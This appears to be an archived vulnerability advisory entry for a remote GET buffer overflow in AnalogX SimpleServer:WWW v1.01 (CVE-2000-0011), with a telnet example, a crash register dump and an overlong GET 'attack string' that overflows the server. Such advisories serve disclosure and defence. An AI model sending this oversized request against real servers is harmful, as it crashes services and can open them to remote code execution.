Remote GET Buffer Overflow Vulnerability

Against

AnalogX SimpleServer:WWW v1.01 on Windows

IDs

Bugtraq: 0906
CVE: CVE-2000-0011

Category

Buffer overflow

Effect

Remote access

Source

Packetstorm

Description

Edited from the discovers' announcement.

AnalogX SimpleServer:WWW HTTP Server v1.1

UssrLabs found a Local / Remote Buffer overflow, The code that handles GET commands has an unchecked buffer that will allow arbitrary code to be executed if it is overflowed.

Example:

[hell@imahacker]$ telnet die.communitech.net 80
Trying example.com...
Connected to die.communitech.net
Escape character is '^]'.
GET (buffer) HTTP/1.1 
Where [buffer] is aprox. 1000 characters. At his point the server overflows.

And in remote machine someone will be see something like this:

HTTP caused an invalid page fault in
module  at 0000:41414141.
Registers:
EAX=00afffbc CS=017f EIP=41414141 EFLGS=00010246
EBX=00afffbc SS=0187 ESP=00af0060 EBP=00af0080
ECX=00af0104 DS=0187 ESI=816294f0 FS=0e47
EDX=bff76855 ES=0187 EDI=00af012c GS=0000
Bytes at CS:EIP:

Stack dump:
bff76849 00af012c 00afffbc 00af0148 00af0104 00af0238 bff76855
00afffbc 00af0114 bff87fe9 00af012c 00afffbc 00af0148 00af0104
41414141 00af02f0

Attack string

GET xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx HTTP/1.0

Attack program source

None available.